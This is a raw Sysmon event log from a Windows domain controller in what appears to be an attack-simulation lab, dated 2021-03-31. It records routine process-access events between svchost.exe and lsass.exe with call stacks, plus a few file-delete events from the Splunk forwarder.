12:02:15.156{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004714Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.156{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004713Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.156{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004712Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.156{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004711Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.156{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004710Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.156{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004709Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.156{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004708Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.078{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004707Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.078{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004706Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.078{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004705Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.078{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004704Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.078{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004703Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.078{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004702Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.078{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004701Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.063{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24cea|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004700Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.063{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000004699Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.047{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0F9915113AF17DC8DCE67FF6FEDF38D5,SHA256=26FC0450041584141A2177B31E721185CE5AB4C0C1CB1C2BE25D91D382BEC8A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000004698Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.047{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=61AA8A8B7993894FF54408648292ECEE,SHA256=4A70BA3DA8ACE682D138A3F829A457BF013371E936FD391D7E1198D5B3938FAB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005030Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.900{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005029Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.900{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005028Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.900{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005027Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.900{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005026Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.900{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005025Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.900{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005024Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.900{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005023Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.822{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1MD5=08D33FDECF9DFDB3AAA55E46F4DDF872,SHA256=8890B44AAD4579F4798FAE71AF174F6AA9BF78A2556F77174D8B4E457E600EBE,IMPHASH=00000000000000000000000000000000falsetrue 